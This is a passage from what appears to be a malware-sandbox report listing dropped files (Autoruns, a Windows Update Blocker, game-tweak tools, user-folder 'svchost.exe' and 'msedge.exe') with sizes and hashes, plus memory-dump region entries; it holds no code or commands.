                                                                                                                                      a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

                                                                                                                                      SHA512

                                                                                                                                      a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dwj2lzt5.we3.ps1

                                                                                                                                      Filesize

                                                                                                                                      60B

                                                                                                                                      MD5

                                                                                                                                      d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                                      SHA1

                                                                                                                                      6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                                      SHA256

                                                                                                                                      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                                      SHA512

                                                                                                                                      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\exm.zip

                                                                                                                                      Filesize

                                                                                                                                      13.3MB

                                                                                                                                      MD5

                                                                                                                                      57a6527690625bea4e4f668e7db6b2aa

                                                                                                                                      SHA1

                                                                                                                                      c5799fd94999d128203e81e22c6d9fdb86e167ee

                                                                                                                                      SHA256

                                                                                                                                      076e01b09f9c5cccc273b2f7dfa1a1efccc1a8e8ebf98a7eee756024b93bad17

                                                                                                                                      SHA512

                                                                                                                                      d86c7f79989eb0781e15f8631048506ffab338f933ddfedbcc2c7464447770beaf21b7ed3cba2ebb97be5ffdc9a450f2df2e2313efaeb8e8101f2ee53c066e4e

                                                                                                                                    • C:\Users\Admin\msedge.exe

                                                                                                                                      Filesize

                                                                                                                                      146KB

                                                                                                                                      MD5

                                                                                                                                      f1c2525da4f545e783535c2875962c13

                                                                                                                                      SHA1

                                                                                                                                      92bf515741775fac22690efc0e400f6997eba735

                                                                                                                                      SHA256

                                                                                                                                      9e6985fdb3bfa539f3d6d6fca9aaf18356c28a00604c4f961562c34fa9f11d0f

                                                                                                                                      SHA512

                                                                                                                                      56308ac106caa84798925661406a25047df8d90e4b65b587b261010293587938fa922fbb2cfdedfe71139e16bfcf38e54bb31cbcc00cd244db15d756459b6133

                                                                                                                                    • C:\Users\Admin\svchost.exe

                                                                                                                                      Filesize

                                                                                                                                      226KB

                                                                                                                                      MD5

                                                                                                                                      1bea6c3f126cf5446f134d0926705cee

                                                                                                                                      SHA1

                                                                                                                                      02c49933d0c2cc068402a93578d4768745490d58

                                                                                                                                      SHA256

                                                                                                                                      1d69b5b87c4cd1251c5c94461a455659febb683eab0ebd97dd30da2319ffc638

                                                                                                                                      SHA512

                                                                                                                                      eb9f423f6adb5e686a53f5f197e6b08455f8048d965a9ec850838fdf4724ef87f68945c435ace5a48a9a7226006a348e97586335d0246ea0dc898a412dea5df3

                                                                                                                                    • C:\exm\Autoruns\Autoruns.exe

                                                                                                                                      Filesize

                                                                                                                                      1.7MB

                                                                                                                                      MD5

                                                                                                                                      17bd13edd536269c417ba8e1b4534fbe

                                                                                                                                      SHA1

                                                                                                                                      22470bb3a4c37a0c612ff7ad2596306065ac0c9b

                                                                                                                                      SHA256

                                                                                                                                      6111a70da65153e6ded71eae2057bf6760f340476261f6e15a80479daf9724eb

                                                                                                                                      SHA512

                                                                                                                                      00d8c80dcfdda235d06160b40d06e47bd0be5178c5fb2b26bf4cd984eae520d877517a16d1a62d88ed1f0a46244eafd4cc4b4183a35f85d13b250e492d441455

                                                                                                                                    • C:\exm\Autoruns\Autoruns64.exe

                                                                                                                                      Filesize

                                                                                                                                      1.9MB

                                                                                                                                      MD5

                                                                                                                                      6ae8e963b33ee52df761412b451b2962

                                                                                                                                      SHA1

                                                                                                                                      f7ab1987848a91af2c77a72583211dcadeed420a

                                                                                                                                      SHA256

                                                                                                                                      f59056339de56820e57c961d6ddd9032bd78af9f2333797944f4ee57b77ee2ca

                                                                                                                                      SHA512

                                                                                                                                      472f07bb37966d056d9efb97e4b686951987ca358a9f213fa6db5ec50cf4a32084cb18c863c8c1add20a2619154cf9f4705541e27c196142917eb9491b54846a

                                                                                                                                    • C:\exm\Autoruns\Autoruns64a.exe

                                                                                                                                      Filesize

                                                                                                                                      2.0MB

                                                                                                                                      MD5

                                                                                                                                      d518661b0940e2464aa8d3073599ab89

                                                                                                                                      SHA1

                                                                                                                                      66be7b41b80477d7ea0045319a08362253d08097

                                                                                                                                      SHA256

                                                                                                                                      d6aee475688b942a2ea49ba4cc5c73ca97191ad91d7d8c2e4a57e07dcf9c9ba6

                                                                                                                                      SHA512

                                                                                                                                      e12967de56c1e514c22adeac308c87b2ee12d86055fb3b4e456db29bb653254cc96715afc3b701ff21c5137b2223a67bbb84a08fd05bfd15f199bdb6ab24e915

                                                                                                                                    • C:\exm\Autoruns\Eula.txt

                                                                                                                                      Filesize

                                                                                                                                      7KB

                                                                                                                                      MD5

                                                                                                                                      8c24c4084cdc3b7e7f7a88444a012bfc

                                                                                                                                      SHA1

                                                                                                                                      5ab806618497189342722d42dc382623ac3e1b55

                                                                                                                                      SHA256

                                                                                                                                      8329bcbadc7f81539a4969ca13f0be5b8eb7652b912324a1926fc9bfb6ec005a

                                                                                                                                      SHA512

                                                                                                                                      6c74bed85638871fd834b30183e1536e48512dd0f8471624732ac1b487f0eba34dec99f88d2d583335f66df543d5fabf4b8c9456255df2248a4c086f111f0baa

                                                                                                                                    • C:\exm\Autoruns\autoruns.chm

                                                                                                                                      Filesize

                                                                                                                                      24KB

                                                                                                                                      MD5

                                                                                                                                      2c099793584365b8897fca7a4fa397e8

                                                                                                                                      SHA1

                                                                                                                                      50eaf2f529b1e923f7d0238ea8d3eb2187ad19cf

                                                                                                                                      SHA256

                                                                                                                                      ecb58342290940a5eb6b72be6faa1d0afeec9df5898df3e026d75b7b08bd8f9a

                                                                                                                                      SHA512

                                                                                                                                      ae407cd6b2d6ddf033f04b19ddf168423f819a4a42834afe03b7c35f86dd7b6572ced6c325fd9a56eacc9613944c4f3d17831d15713a35f0ea24f4c4c14af0ce

                                                                                                                                    • C:\exm\Autoruns\autorunsc.exe

                                                                                                                                      Filesize

                                                                                                                                      701KB

                                                                                                                                      MD5

                                                                                                                                      1d4611e03d8f32ae08cf8ade9a958729

                                                                                                                                      SHA1

                                                                                                                                      a8a3504eaf57a7d640bd42b5d59d2b8afa3e5f33

                                                                                                                                      SHA256

                                                                                                                                      bfbcf41b4659a4f371d434fc92b0f13bd46cfb82b74910633e900008765bd6da

                                                                                                                                      SHA512

                                                                                                                                      b3114eb005aa1f5f855d86d846099d43b61bbc7353d3acec241a79b691f69080474d356d9e414dfb65036c9a36751d9839fef15f8115ea391e906a841eb52ea4

                                                                                                                                    • C:\exm\Autoruns\autorunsc64.exe

                                                                                                                                      Filesize

                                                                                                                                      784KB

                                                                                                                                      MD5

                                                                                                                                      848e852089ba84056308e184b034c302

                                                                                                                                      SHA1

                                                                                                                                      ffd77f9da61b955b07c76fa392b48c09273d81fd

                                                                                                                                      SHA256

                                                                                                                                      110651323222353e13588adcf82f7a21faa51422a251033a4e1163b9e95ae08a

                                                                                                                                      SHA512

                                                                                                                                      8e45aec194863838ee2e128f765e77b0e6fbfca710279a67fe516a20c273a595a5b1eceba33988c5cbe0c3b3d0238dc25e335a38431b49ac29a35ade099a6259

                                                                                                                                    • C:\exm\Autoruns\autorunsc64a.exe

                                                                                                                                      Filesize

                                                                                                                                      807KB

                                                                                                                                      MD5

                                                                                                                                      0c790f64e69f9d9a4cbde5e21f1a4e93

                                                                                                                                      SHA1

                                                                                                                                      356d1dde5bb5d1a6c43d118910eeff6725a219e9

                                                                                                                                      SHA256

                                                                                                                                      b9c11b7701a269b8151ec8b38577fe2bb4de1e4e1ecd7f63324454054acf6881

                                                                                                                                      SHA512

                                                                                                                                      5d285ff8738dc9aeed61d24e8823f81b568cc251793619d660fa42781b1cb4979c0f67e015183cccddf366f6a96ba9fcda53e91d522642ca8f8bc4bf2461a479

                                                                                                                                    • C:\exm\EXMservice.exe

                                                                                                                                      Filesize

                                                                                                                                      12.0MB

                                                                                                                                      MD5

                                                                                                                                      aab9c36b98e2aeff996b3b38db070527

                                                                                                                                      SHA1

                                                                                                                                      4c2910e1e9b643f16269a2e59e3ada80fa70e5fa

                                                                                                                                      SHA256

                                                                                                                                      c148cc14f15b71a2d3f5e6bce6b706744f6b373a7e6c090c14f46f81d2d6e82f

                                                                                                                                      SHA512

                                                                                                                                      0db75756a041a7cda6b384718581aaf11e6873614465dd56e81f17ad171cffe380e288a3c2ee540222190392904921f26df8a1d66d4108051c60fc8e5b2df779

                                                                                                                                    • C:\exm\FortniteSettings\FortniteSettings.exe

                                                                                                                                      Filesize

                                                                                                                                      9.3MB

                                                                                                                                      MD5

                                                                                                                                      a39de0d010e9d34de70abad81f031e23

                                                                                                                                      SHA1

                                                                                                                                      9903ee2dd6b87369eb33de49d5a3d13135309899

                                                                                                                                      SHA256

                                                                                                                                      3b4e1a5a0d85269d9491e155864e630339e292a9228dc1eb37ff61b0a657ff6e

                                                                                                                                      SHA512

                                                                                                                                      6247314d4ccf1fc14d8a999d476a6370b4e553bab76fb086f4cbf163f59c982643b0820d7d829ed3d3415456a613c777f90ac8c0ff3112be0ec44a7ee126a9d9

                                                                                                                                    • C:\exm\NvidiaProfileInspector\Exm_Premium_Profile_V4.nip

                                                                                                                                      Filesize

                                                                                                                                      684KB

                                                                                                                                      MD5

                                                                                                                                      d5563eaeb8f6e5dbfb2d01fd24b7c8d5

                                                                                                                                      SHA1

                                                                                                                                      f619d9c97f356c0f41ccb8a7da2961b46c4242ef

                                                                                                                                      SHA256

                                                                                                                                      f3904fe5c2475af316b4a41e69bd833e05d8a160089b96e4f97b83fb125426f7

                                                                                                                                      SHA512

                                                                                                                                      0d3823f7582766df5f06cad6e59aca7046889f8be3b6d179a1f7fa1e007f1eed488473bc0f79b0aa347bb86637e0fa14bf4c7a34d13a8835b37acaf17fa4db8d

                                                                                                                                    • C:\exm\NvidiaProfileInspector\Reference.xml

                                                                                                                                      Filesize

                                                                                                                                      213KB

                                                                                                                                      MD5

                                                                                                                                      1a8493bff2d17c83e299101954dcb562

                                                                                                                                      SHA1

                                                                                                                                      439258f42f755d40311a31b37f6d37f447d546ba

                                                                                                                                      SHA256

                                                                                                                                      5a31c0500500713efd83160cef3db3f56b807b7c4f7a8b4ee7f4ffe05c676081

                                                                                                                                      SHA512

                                                                                                                                      75f2383f73fd3e03fdd17e93091cca7192919cb76ff564cafa7ee8d33d50db83d94dd3905d06b67c01f52f580b73573b490beb61f9a58af3cad3c0a29ce0aa2f

                                                                                                                                    • C:\exm\NvidiaProfileInspector\nv.config

                                                                                                                                      Filesize

                                                                                                                                      158B

                                                                                                                                      MD5

                                                                                                                                      ce6d0bc7328b0fab08de80f292c1eaa4

                                                                                                                                      SHA1

                                                                                                                                      ae505d6f60a71259b91865f6d5a3d674e9de0ebe

                                                                                                                                      SHA256

                                                                                                                                      383b8dcb968b6bd0633658d9bb55c4acaf4c85a075aa456904a42d4e4efd5561

                                                                                                                                      SHA512

                                                                                                                                      f009ad44131f19997c7c7be38144132d9f701fda4492f3782a2717b92859f189196fac5a7d7e6ff6952f2c1735f27ffaddf0f7acbb45b98a7d85572e96c16c00

                                                                                                                                    • C:\exm\NvidiaProfileInspector\nvidiaProfileInspector.exe

                                                                                                                                      Filesize

                                                                                                                                      535KB

                                                                                                                                      MD5

                                                                                                                                      ff5f39370b67a274cb58ba7e2039d2e2

                                                                                                                                      SHA1

                                                                                                                                      3020bb33e563e9efe59ea22aa4588bed5f1b2897

                                                                                                                                      SHA256

                                                                                                                                      1233487ea4db928ee062f12b00a6eda01445d001ab55566107234dea4dc65872

                                                                                                                                      SHA512

                                                                                                                                      7decec37c80d1d5ad6296d737d5d16c4fc92353a3ae4bd083c4a7b267bb6073a53d9f6152b20f9b5e62ba6c93f76d08f813812a83ce164db4c91107d7ad5a95f

                                                                                                                                    • C:\exm\PowerPlan\Exm_Premium_Power_Plan_V3.pow

                                                                                                                                      Filesize

                                                                                                                                      12KB

                                                                                                                                      MD5

                                                                                                                                      abec2ceb9e8425172e1c7bbabbaf8eb1

                                                                                                                                      SHA1

                                                                                                                                      96bcfdc9bcb7c6fae883473dead92d332f06b162

                                                                                                                                      SHA256

                                                                                                                                      e14a55794a97986b70c4de0f7318561ca525641646451fee00ea53b793f15b6d

                                                                                                                                      SHA512

                                                                                                                                      c86445f87673d2ec4302adba4c6d828b1d1fe0429c7168cdc8f0f7074b8b2bd60974e9b27567b8e25eda2272e7f0fe5253ceb7090d54086c2c821d95bf30f5f1

                                                                                                                                    • C:\exm\WindowsUpdateBlocker\Wub.exe

                                                                                                                                      Filesize

                                                                                                                                      791KB

                                                                                                                                      MD5

                                                                                                                                      82aff8883099cf75462057c4e47e88ac

                                                                                                                                      SHA1

                                                                                                                                      68e2939f59b3869e9bd3ecc4aca3947649631bf8

                                                                                                                                      SHA256

                                                                                                                                      aac1123f17f8569a36bf93876cea30e15103fd2379b401a79129a2a6e7285ac2

                                                                                                                                      SHA512

                                                                                                                                      212ac940a1f8bdd805813c279d471efc53b858bc35c5edad182dfde3c29c37854618a507a0a0839e5a383d1ba4fe317c0b3c8275d023c86ecfa36f221560b96d

                                                                                                                                    • C:\exm\WindowsUpdateBlocker\Wub.ini

                                                                                                                                      Filesize

                                                                                                                                      97KB

                                                                                                                                      MD5

                                                                                                                                      a16bf55cd2ef7d9e56565b0ed1aa208a

                                                                                                                                      SHA1

                                                                                                                                      19edddaa24f73d9d01150babd58b1bcc0ff5d849

                                                                                                                                      SHA256

                                                                                                                                      30eb977d58106050818626b9b556a3badc7b7d012462903120a0663987c74c0b

                                                                                                                                      SHA512

                                                                                                                                      ab87d94620b0d77bfa8ff3e721bbb68a28185245b173be7b62195588e2a3b3d3a9ee085497300c14876118dff4edca7fea202328f3156a76c53f786b8d5b6118

                                                                                                                                    • C:\exm\WindowsUpdateBlocker\Wub_x64.exe

                                                                                                                                      Filesize

                                                                                                                                      939KB

                                                                                                                                      MD5

                                                                                                                                      9d6778f7f274f7ecd4e7e875a7268b64

                                                                                                                                      SHA1

                                                                                                                                      452fa439f1cc0b9fcc37cf4b8cfff96e8cc348aa

                                                                                                                                      SHA256

                                                                                                                                      187eeee9e518011de1b87cfb0ed03e12ea551e9011f0c8defdd0e4535e672da2

                                                                                                                                      SHA512

                                                                                                                                      d51df55a5f903ec624550e847459bfa52fb19e892a58fe2de41251d9d98890b36f26a4950ad75f900de0311b5330066aaece11ec5e549d5b3867a61a344e0b87

                                                                                                                                    • memory/2096-139-0x0000000000F90000-0x0000000000FBA000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      168KB

                                                                                                                                    • memory/2148-82-0x00000000002B0000-0x0000000000316000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      408KB

                                                                                                                                    • memory/2252-0-0x00007FF9DB8B3000-0x00007FF9DB8B5000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      8KB

                                                                                                                                    • memory/2252-1-0x0000023DB0A50000-0x0000023DB0A72000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      136KB

                                                                                                                                    • memory/2252-11-0x00007FF9DB8B0000-0x00007FF9DC371000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      10.8MB

                                                                                                                                    • memory/2252-12-0x00007FF9DB8B0000-0x00007FF9DC371000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      10.8MB

                                                                                                                                    • memory/2252-15-0x00007FF9DB8B0000-0x00007FF9DC371000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      10.8MB

                                                                                                                                    • memory/2552-143-0x0000000000B20000-0x0000000000B5E000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      248KB

                                                                                                                                    • memory/2552-310-0x0000000006790000-0x000000000679A000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      40KB

                                                                                                                                    • memory/2552-144-0x0000000005C70000-0x0000000005CD6000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      408KB

                                                                                                                                    • memory/2552-305-0x00000000065E0000-0x0000000006672000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      584KB

                                                                                                                                    • memory/2552-306-0x0000000006C30000-0x00000000071D4000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      5.6MB

                                                                                                                                    • memory/3180-40-0x00000235A7E10000-0x00000235A7E1A000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      40KB

                                                                                                                                    • memory/3180-39-0x00000235A81B0000-0x00000235A81C2000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      72KB